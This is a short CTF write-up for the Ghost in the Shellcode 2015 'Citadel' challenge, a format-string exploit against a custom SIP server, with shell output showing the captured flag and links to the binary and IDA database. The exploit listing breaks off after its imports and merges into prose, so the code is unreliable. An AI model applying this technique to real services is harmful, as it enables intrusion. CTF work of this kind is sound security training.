This is my exploit for the Citadel challenge in the Ghost in The Shellcode 2015 Teaser CTF. I have attached my IDB as well, so those of you with IDA Pro can see what the reversing-part of the process looked like.
The Citadel challenge consisted of a custom SIP server (Linux/x86_64), with NX, ASLR and partial RELRO enabled. After some time reverse-engineering the binary, I discovered a format string vulnerability in a call to asprintf(). However, to actually get data under our control on the stack, in order to use the format string vulnerability effectively, I had to do some further digging…
My final exploit code:
#!/usr/bin/python # # Exploit for the Citadel challenge from the Ghost in the Shellcode 2015 Teaser CTF. # # Joel Eriksson2014 import telnetlib import struct import socket import sys u64 = lambda x: struct.pack(" Below you can see the output of the exploit. :)
je@tiny:~$ ./citadel-xpl.py uid=1000(citadel) gid=1000(citadel) groups=1000(citadel) Linux ip-10-101-192-40 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux key{Should have used boost::format}The vulnerable binary:
http://www.clevcode.org/files/citadelMy IDB for the binary:
http://www.clevcode.org/files/citadel.i64